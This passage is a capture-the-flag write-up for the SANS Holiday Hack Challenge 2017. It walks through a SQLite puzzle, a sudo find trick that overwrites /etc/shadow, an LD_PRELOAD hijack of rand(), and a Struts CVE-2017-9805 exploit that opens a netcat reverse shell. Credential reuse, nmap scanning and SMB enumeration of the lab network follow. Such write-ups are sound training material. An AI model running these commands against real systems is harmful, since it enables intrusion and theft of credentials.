CREATE TABLE likes(
  id INTEGER PRIMARY KEY AUTOINCREMENT,
  like INTEGER,
  datetime INTEGER,
  songid INTEGER,
  FOREIGN KEY(songid) REFERENCES songs(id)
);
sqlite&amp;gt; SELECT title, songid, COUNT(like) FROM likes JOIN songs ON songid=songs.id GROUP BY songid ORDER BY COUNT(like) DESC LIMIT 1;
Stairway to Heaven|392|11325
sqlite&amp;gt; .quit
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;And so, the answer is Stairway to Heaven with 11,325 likes.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;elf@7fad6ef31c2a:~$ ./runtoanswer 
Starting up, please wait......



Enter the name of the song with the most likes: Stairway to Heaven
That is the #1 Christmas song, congratulations!
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
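&lt;p&gt;The &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;like&lt;/code&gt; column in the schema is an INTEGER, so it could encode a like/dislike value rather than one row per like, and COUNT counts rows whatever that value is. As an added example that is not part of the original write-up, the Python below rebuilds the schema in an in-memory SQLite database with constructed rows (not the challenge data), shows the check to run on the column first, and runs the write-up’s COUNT query next to a SUM variant so the difference is visible.&lt;/p&gt;

```python
import sqlite3

# Schema as printed by .schema in the challenge terminal. "like" is quoted here
# because LIKE is an SQL keyword; SQLite accepts it bare, other engines may not.
SCHEMA = """
CREATE TABLE songs(
  id INTEGER PRIMARY KEY AUTOINCREMENT,
  title TEXT,
  artist TEXT,
  year TEXT,
  notes TEXT
);
CREATE TABLE likes(
  id INTEGER PRIMARY KEY AUTOINCREMENT,
  "like" INTEGER,
  datetime INTEGER,
  songid INTEGER,
  FOREIGN KEY(songid) REFERENCES songs(id)
);
"""

# Constructed rows, not the challenge data. Song 1 has the most rows in likes,
# but half of them carry like = 0; song 2 has fewer rows, all with like = 1.
SONGS = [
    (1, "Song A", "Artist A", "2017", None),
    (2, "Song B", "Artist B", "2016", None),
]
LIKES = [  # (like, songid)
    (1, 1), (1, 1), (0, 1), (0, 1),
    (1, 2), (1, 2), (1, 2),
]

def open_db():
    """Build the in-memory database with the schema and the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany(
        "INSERT INTO songs(id, title, artist, year, notes) VALUES (?, ?, ?, ?, ?)",
        SONGS)
    conn.executemany(
        'INSERT INTO likes("like", datetime, songid) VALUES (?, 0, ?)', LIKES)
    return conn

def distinct_like_values(conn):
    """The check to run first: which values does the like column actually hold?"""
    rows = conn.execute('SELECT DISTINCT "like" FROM likes ORDER BY "like"').fetchall()
    return [r[0] for r in rows]

def top_by_row_count(conn):
    """The write-up's query: COUNT counts rows, so every likes row contributes 1."""
    return conn.execute(
        'SELECT title, songid, COUNT("like") FROM likes '
        'JOIN songs ON songid = songs.id '
        'GROUP BY songid ORDER BY COUNT("like") DESC LIMIT 1').fetchone()

def top_by_like_sum(conn):
    """Same join, but SUM adds the like values, so like = 0 rows do not count."""
    return conn.execute(
        'SELECT title, songid, SUM("like") FROM likes '
        'JOIN songs ON songid = songs.id '
        'GROUP BY songid ORDER BY SUM("like") DESC LIMIT 1').fetchone()

if __name__ == "__main__":
    db = open_db()
    print("like values present:", distinct_like_values(db))
    print("by row count:", top_by_row_count(db))
    print("by like sum: ", top_by_like_sum(db))
```

If the check returns only 1, both queries agree and the write-up’s COUNT is exactly right; if it returns 0 and 1, the two rankings can differ as they do on the constructed rows.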

&lt;h3 id=&quot;oh-wait-maybe-we-are&quot;&gt;Oh Wait! Maybe We Are…&lt;/h3&gt;

&lt;h4 id=&quot;terminal-6&quot;&gt;Terminal&lt;/h4&gt;

&lt;p&gt;The terminal in this level gives us the following banner&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;              \ /
            --&amp;gt;*&amp;lt;--
              /o\
             /_\_\
            /_/_0_\
           /_o_\_\_\
          /_/_/_/_/o\
         /@\_\_\@\_\_\
        /_/_/O/_/_/_/_\
       /_\_\_\_\_\o\_\_\
      /_/0/_/_/_0_/_/@/_\
     /_\_\_\_\_\_\_\_\_\_\
    /_/o/_/_/@/_/_/o/_/0/_\
   jgs       [___]  


My name is Shinny Upatree, and I've made a big mistake.
I fear it's worse than the time I served everyone bad hake.
I've deleted an important file, which suppressed my server access.
I can offer you a gift, if you can fix my ill-fated redress.

Restore /etc/shadow with the contents of /etc/shadow.bak, then run &quot;inspect_da_box&quot; to complete this challenge.
Hint: What commands can you run with sudo?
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Starting with the hint, we examine which commands we can run using &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;sudo&lt;/code&gt;&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;elf@466f6ff38e11:~$ sudo -l
Matching Defaults entries for elf on 466f6ff38e11:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User elf may run the following commands on 466f6ff38e11:
    (elf : shadow) NOPASSWD: /usr/bin/find
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;We can see that we may use &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;sudo&lt;/code&gt; to run &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/usr/bin/find&lt;/code&gt; as the user &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;elf&lt;/code&gt; (which we are) and under the group &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;shadow&lt;/code&gt;. Moreover, by using &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;find&lt;/code&gt;’s &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;exec&lt;/code&gt; parameter, we can find the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/etc/shadow.bak&lt;/code&gt; file and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;cp&lt;/code&gt; it to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/etc/shadow&lt;/code&gt; like so&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;elf@466f6ff38e11:~$ sudo -g shadow find /etc/ -name shadow.bak -exec cp {} /etc/shadow \; 2&amp;gt; /dev/null
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Then we run &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;inspect_da_box&lt;/code&gt; to finish this terminal puzzle&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;elf@466f6ff38e11:~$ inspect_da_box
                     ___
                    / __'.     .-&quot;&quot;&quot;-.
              .-&quot;&quot;-| |  '.'.  / .---. \
             / .--. \ \___\ \/ /____| |
            / /    \ `-.-;-(`_)_____.-'._
           ; ;      `.-&quot; &quot;-:_,(o:==..`-. '.         .-&quot;-,
           | |      /       \ /      `\ `. \       / .-. \
           \ \     |         Y    __...\  \ \     / /   \/
     /\     | |    | .--&quot;&quot;--.| .-'      \  '.`---' /
     \ \   / /     |`        \'   _...--.;   '---'`
      \ '-' / jgs  /_..---.._ \ .'\\_     `.
       `--'`      .'    (_)  `'/   (_)     /
                  `._       _.'|         .'
                     ```````    '-...--'`
/etc/shadow has been successfully restored!
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h3 id=&quot;were-off-to-see-the&quot;&gt;We’re Off to See the…&lt;/h3&gt;

&lt;h4 id=&quot;terminal-7&quot;&gt;Terminal&lt;/h4&gt;

&lt;p&gt;The terminal in this level gives us the following banner&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;                 .--._.--.--.__.--.--.__.--.--.__.--.--._.--.
               _(_      _Y_      _Y_      _Y_      _Y_      _)_
              [___]    [___]    [___]    [___]    [___]    [___]
              /:' \    /:' \    /:' \    /:' \    /:' \    /:' \
             |::   |  |::   |  |::   |  |::   |  |::   |  |::   |
             \::.  /  \::.  /  \::.  /  \::.  /  \::.  /  \::.  /
         jgs  \::./    \::./    \::./    \::./    \::./    \::./
               '='      '='      '='      '='      '='      '='

Wunorse Openslae has a special challenge for you.
Run the given binary, make it return 42.
Use the partial source for hints, it is just a clue.
You will need to write your own code, but only a line or two.

total 88
-rwxr-xr-x 1 root root 84824 Dec 16 16:47 isit42
-rw-r--r-- 1 root root   654 Dec 15 19:59 isit42.c.un
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;The contents of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;isit42.c.un&lt;/code&gt; are as follows&lt;/p&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-c&quot; data-lang=&quot;c&quot;&gt;&lt;span class=&quot;cp&quot;&gt;#include &amp;lt;stdio.h&amp;gt;
&lt;/span&gt;&lt;span class=&quot;c1&quot;&gt;// DATA CORRUPTION ERROR&lt;/span&gt;
&lt;span class=&quot;c1&quot;&gt;// MUCH OF THIS CODE HAS BEEN LOST&lt;/span&gt;
&lt;span class=&quot;c1&quot;&gt;// FORTUNATELY, YOU DON'T NEED IT FOR THIS CHALLENGE&lt;/span&gt;
&lt;span class=&quot;c1&quot;&gt;// MAKE THE isit42 BINARY RETURN 42&lt;/span&gt;
&lt;span class=&quot;c1&quot;&gt;// YOU'LL NEED TO WRITE A SEPERATE C SOURCE TO WIN EVERY TIME&lt;/span&gt;
&lt;span class=&quot;kt&quot;&gt;int&lt;/span&gt; &lt;span class=&quot;nf&quot;&gt;getrand&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;srand&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;((&lt;/span&gt;&lt;span class=&quot;kt&quot;&gt;unsigned&lt;/span&gt; &lt;span class=&quot;kt&quot;&gt;int&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;time&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;NULL&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;));&lt;/span&gt; 
    &lt;span class=&quot;n&quot;&gt;printf&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;Calling rand() to select a random number.&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\n&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
    &lt;span class=&quot;c1&quot;&gt;// The prototype for rand is: int rand(void);&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;rand&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;%&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;4096&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;c1&quot;&gt;// returns a pseudo-random integer between 0 and 4096&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;kt&quot;&gt;int&lt;/span&gt; &lt;span class=&quot;nf&quot;&gt;main&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;sleep&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
    &lt;span class=&quot;kt&quot;&gt;int&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;randnum&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;getrand&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;();&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;randnum&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;42&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;n&quot;&gt;printf&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;Yay!&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\n&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;else&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;n&quot;&gt;printf&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;Boo!&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\n&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;randnum&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;p&gt;Here, we can write our own implementation of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;int rand(void)&lt;/code&gt; which always returns 42, compile it as a shared library, and use &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;LD_PRELOAD&lt;/code&gt; to get the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;isit42&lt;/code&gt; binary to use it for calls to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;rand()&lt;/code&gt; instead of the implementation provided by the distribution’s libraries. See &lt;a href=&quot;https://pen-testing.sans.org/blog/2017/12/06/go-to-the-head-of-the-class-ld-preload-for-the-win&quot;&gt;Ed Skoudis’s excellent blog post for more information&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;We place the following implementation of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;rand()&lt;/code&gt; in a file called &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;fakerand.c&lt;/code&gt;&lt;/p&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-c&quot; data-lang=&quot;c&quot;&gt;&lt;span class=&quot;kt&quot;&gt;int&lt;/span&gt; &lt;span class=&quot;nf&quot;&gt;rand&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;kt&quot;&gt;void&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;42&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;p&gt;We then compile this code into a shared library and run the provided binary, forcing it to use this library, like so&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;elf@d5c73ce61adb:~$ gcc fakerand.c -o fakerand -shared -fPIC
elf@d5c73ce61adb:~$ LD_PRELOAD=&quot;$PWD/fakerand&quot; ./isit42
Starting up ... done.
Calling rand() to select a random number.
                 .-. 
                .;;\ ||           _______  __   __  _______    _______  __    _  _______  _     _  _______  ______ 
               /::::\|/          |       ||  | |  ||       |  |   _   ||  |  | ||       || | _ | ||       ||    _ |
              /::::'();          |_     _||  |_|  ||    ___|  |  |_|  ||   |_| ||  _____|| || || ||    ___||   | ||
            |\/`\:_/`\/|           |   |  |       ||   |___   |       ||       || |_____ |       ||   |___ |   |_||_ 
        ,__ |0_..().._0| __,       |   |  |       ||    ___|  |       ||  _    ||_____  ||       ||    ___||    __  |
         \,`////&quot;&quot;&quot;&quot;\\\\`,/        |   |  |   _   ||   |___   |   _   || | |   | _____| ||   _   ||   |___ |   |  | |
         | )//_ o  o _\\( |        |___|  |__| |__||_______|  |__| |__||_|  |__||_______||__| |__||_______||___|  |_|
          \/|(_) () (_)|\/ 
            \   '()'   /            ______    _______  _______  ___      ___      __   __    ___   _______ 
            _:.______.;_           |    _ |  |       ||   _   ||   |    |   |    |  | |  |  |   | |       |
          /| | /`\/`\ | |\         |   | ||  |    ___||  |_|  ||   |    |   |    |  |_|  |  |   | |  _____|
         / | | \_/\_/ | | \        |   |_||_ |   |___ |       ||   |    |   |    |       |  |   | | |_____ 
        /  |o`&quot;&quot;&quot;&quot;&quot;&quot;&quot;&quot;`o|  \       |    __  ||    ___||       ||   |___ |   |___ |_     _|  |   | |_____  |
       `.__/     ()     \__.'      |   |  | ||   |___ |   _   ||       ||       |  |   |    |   |  _____| |
       |  | ___      ___ |  |      |___|  |_||_______||__| |__||_______||_______|  |___|    |___| |_______|
       /  \|---|    |---|/  \ 
       |  (|42 | () | DA|)  |       _   ___  _______ 
       \  /;---'    '---;\  /      | | |   ||       |
        `` \ ___ /\ ___ / ``       | |_|   ||____   |
            `|  |  |  |`           |       | ____|  |
      jgs    |  |  |  |            |___    || ______| ___ 
       _._  |\|\/||\/|/|  _._          |   || |_____ |   |
      / .-\ |~~~~||~~~~| /-. \         |___||_______||___|
      | \__.'    ||    '.__/ |
       `---------''---------` 
Congratulations! You've won, and have successfully completed this challenge.
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h2 id=&quot;letters-to-santa-systems&quot;&gt;Letters to Santa systems&lt;/h2&gt;

&lt;p&gt;It’s time to get our hands dirty with some actual penetration testing. We’ve been told that the Letters to Santa system is in scope, as well as everything on the 10.142.0.0/24 network behind it.&lt;/p&gt;

&lt;h3 id=&quot;letters-to-santa&quot;&gt;Letters to Santa&lt;/h3&gt;
&lt;p&gt;Visiting the &lt;a href=&quot;https://l2s.northpolechristmastown.com/&quot;&gt;Letters to Santa&lt;/a&gt; application, we see what essentially amounts to an HTML form. Looking at the source for this page, we see there are a couple of hidden elements in the page: the first is a form input for the user to enter their US state as part of their letter (which is of little interest to us), but the second, more interesting tidbit is a link to the &lt;a href=&quot;http://dev.northpolechristmastown.com/&quot;&gt;development version of the application&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Confirming that &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dev.northpolechristmastown.com&lt;/code&gt; resolves to the same IP address (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;35.185.84.51&lt;/code&gt;) as &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;l2s.northpolechristmastown.com&lt;/code&gt;, we consider this to be in scope. This appears to be quite an early version of the Letters to Santa application. We notice at the foot of the page that the application runs on top of Apache Struts, which was subject to a serious XML deserialisation vulnerability during 2017, &lt;a href=&quot;https://www.cvedetails.com/cve/CVE-2017-9805/&quot;&gt;CVE-2017-9805&lt;/a&gt;, which also happens to be the topic of &lt;a href=&quot;https://pen-testing.sans.org/blog/2017/12/05/why-you-need-the-skills-to-tinker-with-publicly-released-exploit-code&quot;&gt;another excellent blog post from Ed Skoudis&lt;/a&gt; on adapting publicly available exploit code to fit your own penetration testing purposes.&lt;/p&gt;

&lt;p&gt;Using the &lt;a href=&quot;https://github.com/chrisjd20/cve-2017-9805.py&quot;&gt;sample code&lt;/a&gt; publicised by Ed in that blog post, and written by GitHub user chrisjd20, we are able to exploit this Letters to Santa development application and get a remote shell on the web server. First we set up a netcat listener to catch the connection with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nc -l -p 4445&lt;/code&gt; and then use the vulnerability to shunt a shell back to us:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:~# python cve-2017-9805.py  -u https://dev.northpolechristmastown.com -c &quot;nc &amp;lt;my IP&amp;gt; 4445 -e /bin/bash&quot;

[+] Encoding Command
[+] Building XML object
[+] Placing command in XML object
[+] Converting Back to String
[+] Making Post Request with our payload
[+] Payload executed
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;This is the answer to the first part of Question 2: Investigate the Letters to Santa application at https://l2s.northpolechristmastown.com. What is the topic of The Great Book page available in the web root of the server?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Exploring the filesystem of the web server, and using the hint in Question 2 about there being a page of the Great Book in the web root, we find &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/var/www/html/GreatBookPage2.pdf&lt;/code&gt; entitled “On the Topic of Flying Animals” (SHA1: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;aa814d1c25455480942cb4106e6cde84be86fb30&lt;/code&gt;).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;This is the answer to the second part of Question 2: What is Alabaster Snowball’s password?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Continuing our exploration of the web server, we can inspect the deployed web application in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/opt/apache-tomcat/webapps/ROOT/&lt;/code&gt;. Grepping recursively for mentions of the string &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;password&lt;/code&gt; we find a match in the Java bytecode in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;WEB-INF/classes/org/demo/rest/example/OrderMySql.class&lt;/code&gt; under this path. This contains the connection parameters for the web application’s backing database, and reveals Alabaster Snowball’s password to be &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;stream_unhappy_buy_loss&lt;/code&gt;.&lt;/p&gt;

&lt;h3 id=&quot;windows-smb-server&quot;&gt;Windows SMB Server&lt;/h3&gt;

&lt;p&gt;It’s time to pivot to some of the systems on the private network behind the Letters to Santa application.&lt;/p&gt;

&lt;p&gt;We connect to the Letters to Santa system over SSH using alabaster_snowball’s credentials to give us a more pleasant experience than that which we had with our reverse shell.&lt;/p&gt;

&lt;p&gt;Handily, the publicly accessible system which we just compromised has &lt;a href=&quot;https://nmap.org/&quot;&gt;the NMAP network scanner&lt;/a&gt; already installed.&lt;/p&gt;

&lt;p&gt;We scan the in-scope network range for an SMB server, specifically looking for hosts with TCP/445 open.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;alabaster_snowball@hhc17-apache-struts2:/tmp/asnow.2TbgbuHPStLAsLqGdKJ2BXUF$ nmap -p 445 --open -Pn 10.142.0.0/24

Starting Nmap 7.40 ( https://nmap.org ) at 2018-01-02 19:56 UTC
Nmap scan report for hhc17-smb-server.c.holidayhack2017.internal (10.142.0.7)
Host is up (0.0015s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap scan report for hhc17-emi.c.holidayhack2017.internal (10.142.0.8)
Host is up (0.00026s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap done: 256 IP addresses (256 hosts up) scanned in 5.85 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Using SSH port forwarding, we forward the open ports on these hosts and explore them again using Alabaster Snowball’s credentials (someone should really have taught him about credential reuse!).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;This is the answer to Question 3: The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server. What is the file server share name?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;On &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;10.142.0.7&lt;/code&gt; there is a share named &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;FileStor&lt;/code&gt; containing five documents.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:~# /usr/share/doc/python-impacket/examples/smbclient.py alabaster_snowball@localhost
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

Password:
Type help for list of commands
# shares
ADMIN$
C$
FileStor
IPC$
# use FileStor
# ls
drw-rw-rw-          0  Tue Jan  2 04:27:27 2018 .
drw-rw-rw-          0  Tue Jan  2 04:27:27 2018 ..
-rw-rw-rw-     255520  Wed Dec  6 21:47:46 2017 BOLO - Munchkin Mole Report.docx
-rw-rw-rw-    1275756  Mon Dec  4 20:04:34 2017 GreatBookPage3.pdf
-rw-rw-rw-     133295  Wed Dec  6 21:47:47 2017 MEMO - Password Policy Reminder.docx
-rw-rw-rw-      10245  Wed Dec  6 22:28:21 2017 Naughty and Nice List.csv
-rw-rw-rw-      60344  Wed Dec  6 21:51:47 2017 Naughty and Nice List.docx
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;So, we can retrieve page 3 of the Great Book, entitled “The Great Schism” (SHA1: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;57737da397cbfda84e88b573cd96d45fcf34a5da&lt;/code&gt;).&lt;/p&gt;

&lt;p&gt;I was unable to access the SMB service listening on &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;10.142.0.8&lt;/code&gt; either as a guest or with Alabaster Snowball’s credentials.&lt;/p&gt;

&lt;h3 id=&quot;elf-web-access&quot;&gt;Elf Web Access&lt;/h3&gt;

&lt;p&gt;Our next target is the Elf Web Access (EWA) mail server which we are told lives on the internal network at &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;http://mail.northpolechristmastown.com/&lt;/code&gt;, so we forward another port over SSH (using the hostname works just fine, but for the sake of completeness this server lives at &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;10.142.0.5&lt;/code&gt;).&lt;/p&gt;

&lt;p&gt;Navigating to the EWA web interface, we are greeted with a login screen. A first good guess of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;alabaster_snowball@northpolechristmastown.com&lt;/code&gt; as a username, and the usual password yields a very helpful error message, which informs us that the user does not exist and furthermore discloses that valid email addresses for this system are of the form &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;first.last@northpolechristmastown.com&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;/images/ewa_validation_fail.png&quot;&gt;&lt;img src=&quot;/images/ewa_validation_fail.png&quot; alt=&quot;center&quot; /&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Adapting our next attempt with this information still does not get us into Alabaster’s mailbox, however. Time to look for a weak spot in the authentication mechanism.&lt;/p&gt;

&lt;p&gt;Looking at the cookies which our browser has after attempting to log into the webmail application, we see that there is a cookie set with the name &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;EWA&lt;/code&gt; and value &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;{&quot;name&quot;:&quot;GUEST&quot;,&quot;plaintext&quot;:&quot;&quot;,&quot;ciphertext&quot;:&quot;&quot;}&lt;/code&gt;. Referring to the first few hints from Pepper Minstix, they suggest that we may find some source code snippets on the web server, and that Alabaster was trying to hide from search engines, and that the crypto was implemented by him (which almost certainly means it is broken in some manner).&lt;/p&gt;

&lt;p&gt;The search engine hint suggests that we might find something interesting in the robots.txt file, and sure enough we find that Alabaster has attempted to exclude the file &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;cookie.txt&lt;/code&gt; from indexing by search engines.&lt;/p&gt;

&lt;p&gt;Fetching the contents of this file, we find the following snippet of JavaScript code which, as the comment at the top suggests, Alabaster found online and adapted for use in EWA (differing functionally only in the cookie name, as far as we can tell).&lt;/p&gt;

